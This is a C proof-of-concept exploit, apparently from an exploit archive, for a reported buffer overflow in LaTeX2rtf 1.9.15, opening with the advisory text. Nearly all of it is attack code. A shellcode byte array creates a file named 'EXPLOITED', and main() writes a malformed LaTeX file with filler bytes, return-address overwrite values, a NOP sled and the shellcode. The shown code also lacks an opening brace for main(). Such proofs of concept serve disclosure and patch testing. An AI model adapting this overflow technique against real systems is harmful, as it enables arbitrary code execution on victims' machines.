/* source: https://www.securityfocus.com/bid/11233/info It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer. Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected. */ char center[] = { 0x59 /* cx = *sp++ */ , 0x31, 0xc0 /* ax ^= ax */ , 0x40 /* ++ax */ , 0x40 /* ++ax */ , 0x40 /* ++ax */ , 0xc1, 0xe0, 0x07 /* ax <<= 7 */ , 0x50 /* *--sp = ax 0600 */ , 0xb8, 0x12, 0x34, 0x56, 0x02 /* ax = 0x02563412 */ , 0xc1, 0xe8, 0x18 /* ax >>= 24 */ , 0xc1, 0xe0, 0x08 /* ax <<= 8 */ , 0x50 /* *--sp = ax 512:O_CREAT */ , 0x51 /* *--sp = cx "EXPLOITED" */ , 0x31, 0xc0 /* ax ^= ax */ , 0xb0, 0x05 /* ax = (ax & ~255) + 5 */ , 0x50 /* *--sp = ax 5:open */ , 0xcd, 0x80 /* syscall */ , 0x31, 0xc0 /* ax ^= ax */ , 0x50 /* *--sp = ax 0 */ , 0x40 /* ++ax */ , 0x50 /* *--sp = ax 1:exit */ , 0xcd, 0x80 /* syscall */ } ; int main() int i; printf("\\def\\row#1{"); for (i = 0;i < 1024;++i) putchar('x'); for (i = 0;i < 6;++i) { /* preserve args[0] */ putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08); } for (i = 0;i < 5;++i) { /* smasher */ putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf); } for (i = 0;i < 256;++i) putchar(0x90); putchar(0xeb); putchar(sizeof(center)); /* 0xeb 0x07 means ip += 7 */ /* assuming here that center has at most 255 bytes */ for (i = 0;i < sizeof center;++i) putchar(center[i]); putchar(0xe8); putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff); /* 0xe8 0xf4 0xff 0xff 0xff means *--sp = ip; ip -= 12 */ printf("EXPLOITED"); printf("}\n"); printf("\\begin{document}\n"); printf("\\row a\n"); printf("\\end{document}\n"); }